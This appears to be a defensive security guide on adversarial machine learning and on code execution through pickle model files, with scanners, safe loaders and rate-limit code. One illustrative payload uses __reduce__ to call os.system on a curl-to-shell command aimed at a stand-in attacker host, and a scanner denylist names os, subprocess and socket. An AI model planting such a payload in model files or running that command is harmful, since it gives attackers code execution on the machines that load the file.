Adversarial machine learning

This is a decade of research that still governs any classifier in an estate (fraud, malware, vision, biometrics) and underlies the embedding, multimodal, and infrastructure attacks covered later. It divides into five families, each with a canonical example; evasion is worked through below.

Family | Target / asset | Canonical example
Evasion | Inference-time decision | FGSM/PGD perturbations flip a malware or image classifier (Goodfellow; Madry)
Poisoning / backdoor | Training/fine-tune data | BadNets trigger: model behaves until it sees the attacker’s cue (Gu)
Extraction | Model IP via API | Rebuild a functional copy from query/response pairs (Tramèr)
Membership inference | Training-set privacy | Was this record used to train? (Shokri)
Model inversion | Training-data reconstruction | Recover representative faces from a recognition model (Fredrikson)

Worked example - the adversarial-example principle (FGSM, illustrative)
# A tiny perturbation in the direction that most increases the model's loss
# flips the prediction while looking unchanged to a human.
perturbation = epsilon * sign( gradient_of_loss_wrt_input ) # epsilon ~ a few /255
adversarial_image = original_image + perturbation
# model(original_image) -> "stop sign" (0.98)
# model(adversarial_image) -> "speed limit" (0.91) visually identical
# DEFENSE: adversarial training (train on such examples), input
# transformation/randomization, and report robustness under PGD, not just FGSM.

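That single idea - step the input in the direction of the sign of the loss gradient - underlies the whole evasion family. Stronger attacks (PGD) iterate the step and project the result back into the allowed perturbation budget after each one, and transferability means an attacker can craft the perturbation on a surrogate model and fire it at yours (II.18 covers the text-domain analogue).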
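
The FGSM step and its iterated PGD form can be sketched in runnable form. This is a minimal, dependency-free illustration, assuming a toy logistic-regression "classifier" over 64 pixel values in [0, 1]; the weights, input, and step sizes are invented for the example and are not taken from the cited papers.

```python
import math

def predict(w, b, x):
    """Probability of class 1 under a toy logistic model (stand-in for a real classifier)."""
    z = sum(wi * xi for wi, xi in zip(w, x)) + b
    return 1.0 / (1.0 + math.exp(-z))

def loss_grad_wrt_input(w, b, x, y):
    """Gradient of binary cross-entropy with respect to the input x."""
    err = predict(w, b, x) - y
    return [err * wi for wi in w]

def sign(v):
    return (v > 0) - (v < 0)

def clamp(v, lo, hi):
    return max(lo, min(hi, v))

def fgsm(w, b, x, y, epsilon):
    """One signed-gradient step of size epsilon, kept inside the valid pixel range."""
    grad = loss_grad_wrt_input(w, b, x, y)
    return [clamp(xi + epsilon * sign(g), 0.0, 1.0) for xi, g in zip(x, grad)]

def pgd(w, b, x, y, epsilon, step, iters):
    """Repeated small signed steps, projected back into the L-infinity ball around x."""
    x_adv = list(x)
    for _ in range(iters):
        grad = loss_grad_wrt_input(w, b, x_adv, y)
        x_adv = [
            clamp(clamp(xa + step * sign(g), xi - epsilon, xi + epsilon), 0.0, 1.0)
            for xa, xi, g in zip(x_adv, x, grad)
        ]
    return x_adv

# Toy setup (all values are assumptions for illustration).
w = [1.0, -1.0] * 32                   # 64 alternating weights
b = 0.0
x = [0.5 + 0.01 * wi for wi in w]      # clean input, classified as class 1
y = 1.0                                # true label
epsilon = 8 / 255                      # perturbation budget per pixel

p_clean = predict(w, b, x)
x_fgsm = fgsm(w, b, x, y, epsilon)
x_pgd = pgd(w, b, x, y, epsilon, step=2 / 255, iters=10)
p_fgsm = predict(w, b, x_fgsm)
p_pgd = predict(w, b, x_pgd)
print(f"clean={p_clean:.3f} fgsm={p_fgsm:.3f} pgd={p_pgd:.3f}")
```

On a linear model like this one, PGD ends at the same corner of the budget as FGSM; the extra iterations matter on deep networks, where the gradient direction changes as the input moves.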

Canon

  • Goodfellow 2014 — Explaining & Harnessing Adversarial Examples (FGSM) — arXiv:1412.6572
  • Madry 2017 — Resistance to Adversarial Attacks (PGD) — arXiv:1706.06083
  • Gu 2017 — BadNets - backdoor attacks — arXiv:1708.06733
  • Tramèr 2016 — Stealing ML Models via Prediction APIs — USENIX Security

For the organization

  • Inventory every model making a security or eligibility decision; pen-test it as a tamperable control.
  • If you fine-tune or run RAG, treat the data pipeline as attacker-reachable: validate sources, sign datasets, test for backdoors before promotion.
  • Rate-limit and monitor prediction APIs against extraction.
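
Extraction attacks need many query/response pairs, so a per-client query budget is one simple control for the last point. The sketch below is an assumption-laden illustration, not a production limiter: the `QueryBudget` class, its parameters, and the client identifier are all hypothetical, and the clock is passed in explicitly so the behaviour is easy to test.

```python
from collections import defaultdict, deque

class QueryBudget:
    """Sliding-window query counter per API client (hypothetical helper)."""

    def __init__(self, max_queries, window_seconds):
        self.max_queries = max_queries
        self.window_seconds = window_seconds
        self._history = defaultdict(deque)  # client_id -> timestamps of allowed queries

    def allow(self, client_id, now):
        """Return True if the client may query at time `now` (seconds)."""
        timestamps = self._history[client_id]
        # Drop timestamps that have aged out of the window.
        while timestamps and now - timestamps[0] >= self.window_seconds:
            timestamps.popleft()
        if len(timestamps) >= self.max_queries:
            return False  # over budget: reject, and ideally raise an alert
        timestamps.append(now)
        return True

budget = QueryBudget(max_queries=3, window_seconds=60.0)
decisions = [budget.allow("client-a", t) for t in (0.0, 1.0, 2.0, 3.0, 61.0)]
print(decisions)  # [True, True, True, False, True]
```

In a real service the timestamp would come from something like `time.monotonic()`, and rejected requests would feed the monitoring pipeline rather than being silently dropped.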

Model files are executable: serialization & deserialization attacks

A trained model ships as a file, and the common formats are not inert data - they can run code when loaded. Python’s pickle (used by PyTorch’s torch.load, scikit-learn, and joblib) invokes attacker-chosen callables during deserialization, and TensorFlow/Keras Lambda layers (including those stored in HDF5 model files) and TorchScript archives can likewise carry code that runs at load or inference time. Loading an attacker’s model file is therefore arbitrary code execution on the machine that loads it - a supply-chain RCE that needs no exploit, just model.load(). The pickle RCE primitive has been publicly documented since at least 2011; what changed is that model-sharing hubs turned it into a distribution channel.

Worked example - the pickle RCE primitive (illustrative)
# pickle calls __reduce__ on load to reconstruct an object; an attacker
# returns a callable + args, and the "reconstruction" runs their code.
class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://attacker/x | sh",))  # runs on torch.load()
# Saved into a .bin/.pt/.pkl model, this executes the moment a victim loads it.
# DEFENSE: never load untrusted pickle; prefer safetensors (weights only, no code);
# PyTorch weights_only=True is the default since v2.6; scan in CI before promotion.
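
The same primitive can be observed safely, along with the restricted-loader idea behind the defense. This is a minimal sketch using only the standard library: the payload calls the harmless builtin `len` instead of `os.system`, and `AllowlistUnpickler` is a hypothetical class following the `find_class` override pattern from the Python `pickle` documentation. It is similar in spirit to a weights-only loader, not a copy of PyTorch's implementation.

```python
import io
import pickle
from collections import OrderedDict

class Demo:
    def __reduce__(self):
        # Benign stand-in for the attacker's callable: pickle will call len("abc").
        return (len, ("abc",))

blob = pickle.dumps(Demo())

# A plain load does not return a Demo object; it returns whatever the callable returned,
# which proves the callable ran during deserialization.
result = pickle.loads(blob)
print(result)  # 3

class AllowlistUnpickler(pickle.Unpickler):
    """Refuse every global that is not explicitly allowlisted (hypothetical example)."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

try:
    AllowlistUnpickler(io.BytesIO(blob)).load()
    blocked = False
except pickle.UnpicklingError:
    blocked = True  # builtins.len is not on the allowlist, so the load is refused

# Allowlisted data types still load normally.
safe = AllowlistUnpickler(io.BytesIO(pickle.dumps(OrderedDict(a=1)))).load()
print(blocked, safe)
```

An allowlist fails closed: anything the loader has not been told about is rejected, which is the property a denylist-based scanner cannot offer.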

This is live, not theoretical. JFrog found a Hugging Face model carrying a silent reverse-shell backdoor in 2024; in February 2025 ReversingLabs disclosed nullifAI, where deliberately “broken” pickle files executed a reverse shell while evading Hugging Face’s picklescan. One study tracked a roughly 5× year-over-year rise in malicious model uploads, on a hub where pickle repositories still see billions of downloads a month. Hugging Face scans uploads (ClamAV for malware, picklescan for pickle imports, TruffleHog for secrets) but marks rather than blocks unsafe models - the download-and-run decision is still yours.

Defenses for the model artifact

  • Prefer safetensors - it encodes only tensor data, no executable opcodes, so the deserialization-RCE class is designed out.
  • Use restricted loaders - PyTorch’s weights-only unpickler (weights_only=True) is the default from v2.6, refusing arbitrary callables on load.
  • Scan every third-party model in CI - ModelScan (Protect AI), Fickling (Trail of Bits), and picklescan as a promotion gate before a model reaches a registry.
  • Treat model files as untrusted executables - sandbox loading of anything unverified, and require provenance/signing before use (§16).
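
To illustrate what a CI scan gate checks, the sketch below walks a pickle's opcodes with the standard library's `pickletools` and lists the imports it would resolve, without ever loading it. It is a simplified heuristic under stated assumptions: the `DENYLIST` contents and the function names are hypothetical, and the string tracking ignores memoized names, which the dedicated scanners named above handle more carefully.

```python
import pickle
import pickletools

# Hypothetical denylist of top-level modules that a weights file has no reason to import.
DENYLIST = {"os", "posix", "nt", "subprocess", "sys", "builtins", "runpy", "socket"}

def referenced_globals(data):
    """List 'module.name' references in a pickle byte string without loading it."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols: the argument is "module name" in one string.
            found.append(arg.replace(" ", ".", 1))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Newer protocols: module and name are the two most recently pushed strings
            # (heuristic; names fetched from the memo are not tracked here).
            found.append(f"{strings[-2]}.{strings[-1]}")
        elif isinstance(arg, str):
            strings.append(arg)
    return found

def is_suspicious(data):
    """True if any referenced global comes from a denylisted module."""
    return any(name.split(".", 1)[0] in DENYLIST for name in referenced_globals(data))

class Demo:
    def __reduce__(self):
        return (len, ("abc",))  # benign stand-in for a malicious callable

payload_blob = pickle.dumps(Demo())
plain_blob = pickle.dumps({"weights": [1.0, 2.0]})

print(referenced_globals(payload_blob), is_suspicious(payload_blob))
print(referenced_globals(plain_blob), is_suspicious(plain_blob))
```

A gate built this way should probably treat a file that fails to parse as a failure rather than a pass, since the nullifAI samples relied on deliberately broken pickles slipping past a scanner.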

Sources

  • ReversingLabs 2025 — nullifAI - malicious models evading picklescan — reversinglabs.com, Feb 2025
  • JFrog 2024 — Malicious HF model, silent backdoor — jfrog.com
  • PyTorch / HF — weights-only unpickler (default v2.6+); safetensors — safe model format